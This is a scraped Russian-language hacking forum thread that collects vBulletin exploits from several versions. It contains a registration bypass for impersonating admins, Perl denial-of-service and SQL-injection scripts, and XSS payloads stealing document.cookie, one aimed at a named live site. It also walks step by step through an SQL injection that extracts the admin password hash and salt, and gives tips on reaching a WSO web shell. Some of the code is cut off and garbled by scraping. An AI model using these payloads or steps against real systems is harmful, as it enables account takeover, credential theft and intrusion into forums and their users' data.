![]() |
================================================== =============
vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability ================================================== ============= Цитата:
Цитата:
|
хм...
Цитата:
|
Цитата:
|
�
Вот эти 4 символа после ника добавляешь, к примеру есть на форуме ник test, ты хочешь такой же, пишешь при регистрации этот ник и в конце после ника добавляешь эти символы, и всё |
Цитата:
|
Где &# это есть? Что пихать ? Ты сам понимаешь что пишешь ?
вставляешь символы после ника и всё, если есть уязвимость, значит зарегается нормально под ником админа, а если нету, то напишет что такой пользователь существует. Я вот 1 не понимаю как её раскрутить уязвимость эту, к примеру залогиниться в панели админа под своим созданным ником ? |
Цитата:
|
Цитата:
Цитата:
|
Цитата:
эта строчка для тебя если ломануть хочешь... а если хочешь баг убрать, то добавь эти символы в админке в исключение. чтобы юзеры не могли с этими знаками региться... |
Цитата:
|
и то не все сообщения
Т.к. при отправке через страницу профиля, сообщение будет только тому отправлятся, с чьего профиля отсылают А если в строке ник нейма будут вводить ник, то появится оригинальный и ложный, которым ты создал, и если он выберет твой ложный ник, то придёт тебе сообщения, а так ники в списке одинаковые. |
Цитата:
|
Цитата:
|
[QUOTE="ph1l1ster"]
vBulletin® Version 3.8.2 Denial of Service Exploit Код:
#!usr/bin/perlКод:
print"->n"; |
vBulletin 4.0.8 - Persistent XSS via Profile
vBulletin - Persistent Cross Site Scripting via Profile Versions Affected: 4.0.8 (3.8.* is not vulnerable.) vBulletin is prone to a Persistent Cross Site Scripting vulnerability within the Profile Customization feature. If this feature is not enabled the vulnerability does not exist and the installation of vBulletin is thereby secure. Within the profile customization fields, it is possible to enter colour codes, rgb codes and even images. The image url() function does not sanitize user input in a sufficient way causing vBulletin to be vulnerable to XSS attacks. [1] Private Reflected XSS: An attacker can inject scripts in a simple way, which is only visible to the attacker. Proof of Concept: url() (This is only visible to the attacker when he or she is logged in, and browsing his or her own profile.) [2] Global Reflected XSS: An attacker can inject malicious CSS data executing javascript, which is then visible to anyone browsing the user profile. Even guests visiting the malicious user profile. Proof of Concept: (IE6 only, may not work in IE7+ and FF) url(/);background:url(javascript:document.write(1337)) url(/);width:expression(alert('www.intern0t.net')) Please note that some of these strings may be too long to be injected. However a blog entry at Exploit-DB and a video on YouTube will be released very soon. -:: Solution ::- Turn off profile customization immediately for users able to customize their profile! When a security patch has been provided by the vendor, enable this feature again. Взято с www.exploit-db.com/exploits/15550/ |
vBulletin Version 3.8.4 AdminCP
Стили и шаблоны-Сохранить/загрузить стили загружаем стиль, в поле "Название для загруженного стиля"пишем alert (document.cookie); когда выберем на форуме последний загруженный стиль - увидим алерт и свои куки, так же как и в админке Языки и фразы-Сохранить/загрузить языки В поле "Название загружаемого языка" пишем alert (document.cookie); "Перезаписать язык" выбираем "Создать новый" выбираем файл языка, загружаем идём по адресу http://ваш_форум и видим свои куки, алерт Разделы и модераторы-Добавить раздел в поля "Заголовок" и "Описание" пишем alert (document.cookie); нажимаем "Сохранить" Видим два алерта на главной, и один в админке по адресу Разделы и модераторы-Управление разделами(последний выполнился у меня в ие, в опере не было) Основные настройки-Основные настройки, Название сайта / Ссылка / Контактная информация в поле "Текст авторских прав" пишем alert (document.cookie); нажимаем сохранить на главной видим алерт Объявления-Создать новое объявление Раздел (будет добавлено и в подразделы) оставляем по-дефолту(Во всех разделах) в поле "Заголовок" и поле "Текст" вбиваем alert (document.cookie); нажимаем "Сохранить" Заходим в любой раздел и видим алерт Дополнительные поля профиля-Добавить дополнительное поле профиля Тип поля профиля-Текстовое поле одной строкой, нажимаем "Продолжить" в поле "Заголовок", "Значение по умолчанию" и "Описание" вставляем alert (document.cookie); Какая страница отображает эту опцию? выбираем то, что вам подходит. я же выбрал "Редактировать данные" Нажимаем "Сохранить" по линку http://ваш_форум/profile.php?do=editprofile видим два алерта |
vBulletin 3.8.6 Exploit
Код:
#!/usr/bin/perlHow to use? my $content = get($url2) my $content = get('http://wowcewebsite.com/path/') _____________________________________________* |
Цитата:
|
foozi не пашет
No URL specified on command line. at C:\perl\1.pl line 8. |
Slay90, поправь ошибку в 8-й строке скрипта
|
EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability
[PHP] [COLOR="#000000"]#!/usr/bin/env perl useLWP::UserAgent; sub banner{ print"###################################\n"; print"############ DSecurity ############\n"; print"###################################\n"; print"# Email:dsecurity.vn[at]gmail.com #\n"; print"###################################\n"; } if(@ARGVnew(); $ua->agent("DSecurity"); $ua->cookie_jar({}); sub login(@){ my $username=shift; my $password=shift; my $req=HTTP::Request->new(POST=>$ARGV[0].'/login.php?do=login'); $req->content_type('application/x-www-form-urlencoded'); $req->content("vb_login_username=$username&vb_login_passwor=$password&s=&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&do=login& vb_login_md5password=&vb_login_md5password_utf="); my $res=$ua->request($req); } sub v_request{ #Declare $print=$_[0]; $select=$_[1]; $from=$_[2]; $where=$_[3]; $limit=$_[4]; $sleep=$ARGV[4]; if ($from eq'') {$from='information_schema.tables';} if ($where eq'') {$where='1';} if ($limit eq'') {$limit='0';} if ($sleep eq'') {$sleep='10';} # Create a request my $req=HTTP::Request->new(POST=>$ARGV[0].'/eggavatar.php'); $req->content_type('application/x-www-form-urlencoded'); $req->content('do=addegg&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&eggavatar =1'."' and (SELECT 1 FROM(SELECT COUNT(*),CONCAT( (select$selectfrom$fromWHERE$wherelimit$limit,1),FLOOR(RAND(1)*3))foo FROM information_schema .tables GROUP BY foo)a)-- -'&uid=1&pid=1"); # Pass request to the user agent and get a response back my $res=$ua->request($req); #print $res->content; if($res->content=~ /(MySQL Error)(.*?)'(.*?)0'(.*)/) {$test= $3}; sleep($sleep); return$print.$test."\n"; } &banner; print"\n############################################### ################################################## ############\n"; print"# EggAvatar for vBulletin 3.8.x SQL Injecti on Vulnerability #\n"; print"# Date:06-03-2011 #\n"; print"# Author: DSecurity #\n"; print"# Software Link: http://www.vbteam.info/vb-3-8-x-addons-and-template-modifications/19079-tk-egg-avatar.html #\n"; print"# Version: 2.3.2 #\n"; print"# Tested on: vBulletin 3.8.0 #\n"; print"################################################# ################################################## ##########\n"; #login login($ARGV[1],$ARGV[2]); #Foot print printv_request('MySQL version: ','@@version'); printv_request('Data dir: ','@@datadir'); printv_request('User: ','user()'); printv_request('Database: ','database()'); #Get user for($i=1;$i[COLOR="#007700"] |
Баг с хайдом
_ttp://ru-ua.ws/showthread.php?p=13674 Юзать: http://site.ru/showthread.php?p=1&highlight=[HIDE Фикс: 1. Открыть файл /includes/vS_HHR_Engine.php 2. После [PHP] [COLOR="#000000"][COLOR="#007700"] |
[QUOTE="DotNet"]
Баг с хайдом _ttp://ru-ua.ws/showthread.php?p=13674 Юзать: http://site.ru/showthread.php?p=1&highlight=[HIDE Фикс: 1. Открыть файл /includes/vS_HHR_Engine.php 2. После [PHP] [COLOR="#000000"][COLOR="#007700"] |
Активная XSS в модуле vBH New Tabs Options
vBH New Tabs Options - возможность вставки произвольного js кода на все страницы vBulletin 4.x.x Уязвимость существует из-за отсутствия фильтрации при добавлении новых вкладок в главное навигационное меню, через указанный модуль. Эксплойт, в поле со списком вкладок добавляем: Цитата:
Примечание: Чтобы заюзать уязвимость нужно обладать доступом в AdminCP. |
Vbulletin 4.0.2
Уязвимость: XSS. Код:
================================= Vbulletin 4.0.2 XSS Vulnerability ================================= [+] Vbulletin 4.0.2 XSS Vulnerability 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ###################################### 1 0 I'm 5ubzer0 member from Inj3ct0r Team 1 1 ###################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+] Discovered By: 5ubzer0 [+] My id : http://inj3ct0r.com/author/2307 [+] Original : http://inj3ct0r.com/exploits/9697 # Version: Vbulletin 4.0.2 www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=">alert('xss'); www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=">alert(document.cookie); Exemple: http://www.forumjogosonline.com.br/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=%22%3E%3Cscript%3Ealert(document.cookie);%3C /script%3E |
Работает на 4.0.x - 4.1.2, в 4.1.3 - пропатчено.
http://www.youtube.com/watch?v=fR9RGCqIPkc Нужен аддон для ФФ4 - Live HTTP Headers - http://psp-mode.yolasite.com/resources/liveHTTPheadersFF4.xpi PHP код:
|
/vb/search/searchtools.php
Код:
$id = $vbulletin->db->sql_prepare($id);Код:
function sql_prepare($value)Код:
function sql_prepare($value) |
Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day
Код:
# Google Dork: intitle: powered by Vbulletin 4 |
cChatBox for vBulletin 3.6.8 and 3.7.x SQL Injection Vulnerability
Код:
#!/usr/bin/perl |
Цитата:
Цитата:
|
vBulletin 4.0.0-4.0.2 YaAS (yet another award system) XSS Vulnerability
Код:
vBulletin 4.0.0-4.0.2 YaAS (yet another award system) XSS Vulnerability======================================================================= |
vBulletin 4.1.3pl3 / 4.1.4pl3 / 4.1.5pl1 Cross Site Scriptin
vBulletin 4.1.3pl3 / 4.1.4pl3 / 4.1.5pl1 Cross Site Scriptin Posted on 04 August 2011 *Advisory Information* Title: vBulletin Cross Site Scripting Vulnerability Date published: 02-08-2011 Vendors contacted: vBulletin team *Vulnerability Information* Class: XSS flaw Vulnerable page: Admin Login Page (admincp) Remotely Exploitable: Yes Locally Exploitable: No *Vulnerability Description* vBulletin is a community forum solution for a wide range of users, including industry leading companies. A XSS vulnerability has been discovered that could allow an attacker to carry out an action impersonating a legal user, or to obtain access to a user's account. This flaw allows unauthorized disclosure and modification of information, and it allows disruption of service. *Vulnerable versions* 4.1.3pl3, 4.1.4pl3 & 4.1.5pl1 *Non-vulnerable Packages* . vBulletin prior to 4.1.3 *Vendor Information, Solutions and Workarounds* vBulletin team has released patches for this flaw and patch is released on 02-08-2011. https://www.vbulletin.com/forum/showthread.php/385133-vBulletin-4.1.3-4.1.4-and-4.1.5-Security-Patch *Credits* This vulnerability was discovered by Muhammad Haroon from Innovative Solutions KSA. OWASP Chapter Lead of Pakistan. haroon [at] live [dot] it *Proof of Concept Code* This is a Cross Site Scripting (XSS) vulnerability within vBulletin community forum solution. In order to exploit this flaw following vector would be used. http://www.example.com/forums/admincp/?">alert('Xss_found_By_M.Haroon') *Report Timeline* 30-07-2011: Notifies the vBulletin team about the vulnerability. 31-07-2011: vBulletin Team ask for technical description about the flaw 31-07-2011: Technical Details sent to vbulletin team 02-08-2011: vBulletin notifies that a fix has been produced and is available to the users on 2nd August 2011 03-08-2011: Vulnerability publicly disclosed. |
Если кому нужно, то вот так можно узнать версию форума:
http://xxxx.xxx/archive/archive.css ну или так: http://xxxx.xxx/cpstyles/global.css На самом деле вариантов много |
Цитата:
Код:
vBulletin 4.0.6 – Danial Of Service Exploit (redhat)==================================================== |
Уязвимость пашет на vBulletin 4.x.x
Заходим, регистрируемся (не всегда обязательно, если поиск без всяких там капч и вопросов от имени гостя проходит, то рега не впёрлась). Запускаем лису, плагин liveHTTPHeaders. Вбиваем в поле поиска любую лабуду, например "4234234" и жмём enter В liveHTTPHeaders редактируем запрос таким вот образом, дописывая это: Код:
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*Смотрим исходный код, внизу находим хэш, записываем Теперь оправляем запрос на вывод соли, вот такой: Код:
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select salt from user where userid=1 and row(1,1)>(select count(*),concat( (select user.salt) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*Всё, осталось только расшифровать. Иногда таблица не user называется, тогда хэш мы не увидим, а увидим на месте хэша какую-то лабуду, а чуть выше виден будет префикс, вот его и дописываем в наш запрос, и тогда всё бенч будет. |
Итак дорогие друзья хотелось бы поговорить с вами о шеллах в данном форуме. Сейчас вышел патч для форума и при попытке зайти на шелл через модуль вылазить сообщение:
Код:
Your submission could not be processed because a security token was missing.1.Можно править шелл (использую WSO 2.5) 2. А можно=> Опера=> форум с шелом=> Исходный код=> После Код:
value='>>'Код:
accesskey="r" tabindex="1"ПС может давно известно. Но для меня стало очень актуально и ново данное открыие ПСС Открыл сам. |
Цитата:
|
[3.8.x] Cyb - Advanced Forum Statistics
[4.0.x] VSa - Advanced Forum Statistics c 4 линейки название немного изменилось. был помидор, стал томат. FULL PATH DISCLOSURE (раскрытие путей) Possible integer overflow 3.8.X модуль cyb_topstats PHP код:
Модуль vsa_topstats PHP код:
Код:
POST /misc.php?do=cybstats HTTP/1.1(на 4.1.X не пробовал.) Код:
POST /misc.php?do=vsastats HTTP/1.1 |
Цитата:
|
[CENTER][SIZE="3"][COLOR="DarkOrange"]vBulletin
|
| Время: 08:44 |